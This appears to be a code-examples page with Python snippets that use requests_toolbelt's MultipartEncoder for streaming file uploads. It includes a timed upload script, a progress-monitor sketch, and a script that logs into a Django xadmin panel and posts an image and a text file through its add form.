    parser.add_argument('--target',
                        default="http://127.0.0.1:8000/uploadfile/",
                        help="upload FILE to this url")
    parser.add_argument('--http2',
                        action='store_true',
                        help="use http2 for connection")
    parser.add_argument('--file', help="upload this file", required=True)

    args = parser.parse_args()
    s = requests.Session()
    if args.http2:
        print("Using http2")
        s.mount('https://', HTTP20Adapter())
    else:
        print("Using http1")

    with open(args.file, 'rb') as f:
        # MultipartEncoder allows us to do a streaming upload of a large file
        m = MultipartEncoder(fields={'file': ('filename', f, 'text/plain')})

        start = datetime.datetime.now()
        print(f"Started at {start}")
        s.put(args.target, data=m, headers={'Content-Type': m.content_type})
        end = datetime.datetime.now()
        print(f"Ended at { end }")
        duration = end - start
        print(f"Upload took: {duration}")
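A related sketch, not part of the script above: wrapping the encoder in MultipartEncoderMonitor adds progress reporting to the same kind of streaming upload. The target URL and file name are placeholders.

import requests
from requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor

def progress(monitor):
    # bytes_read is cumulative; monitor.len is the total encoded body size
    print("uploaded {}/{} bytes".format(monitor.bytes_read, monitor.len))

with open("bigfile.bin", "rb") as f:
    encoder = MultipartEncoder(fields={"file": ("bigfile.bin", f, "application/octet-stream")})
    monitor = MultipartEncoderMonitor(encoder, progress)
    requests.put("http://127.0.0.1:8000/uploadfile/",
                 data=monitor,
                 headers={"Content-Type": monitor.content_type})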
Пример #43
0
# def add_file_image():
#     '''Add a file and an image'''

s = requests.session()
login_xadmin(s)
url3 = "http://49.235.92.12:8020/xadmin/hello/fileimage/add/"
r = s.get(url3)

csrfmiddlewaretoken = re.findall(r"value='(.+?)'", r.text)
print(csrfmiddlewaretoken)
body1 = MultipartEncoder(
    fields=[(
        "csrfmiddlewaretoken",
        csrfmiddlewaretoken[0]), ("csrfmiddlewaretoken",
                                  csrfmiddlewaretoken[0]), ("title", "测试小脚本1"),
            ("image", ("5666.png",
                       open(r'C:\Users\Administrator\Desktop\5666.png', "rb"),
                       "image/png")),
            ("fiels", ("ce12.txt",
                       open(r'C:\Users\Administrator\Desktop\ce12.txt', "rb"),
                       "text/plain")), ("_save", "")])
print("345453443453435435434343")
r3 = s.post(url=url3, data=body1, headers={"content-Type": body1.content_type})
print(r3.text)

demo = etree.HTML(r3.text)
result_demo = demo.xpath(
    '//*[@id="changelist-form"]/div[1]/table/tbody/tr[1]/td[2]/a')
print(result_demo[0])
result_get = result_demo[0].text
print(result_get)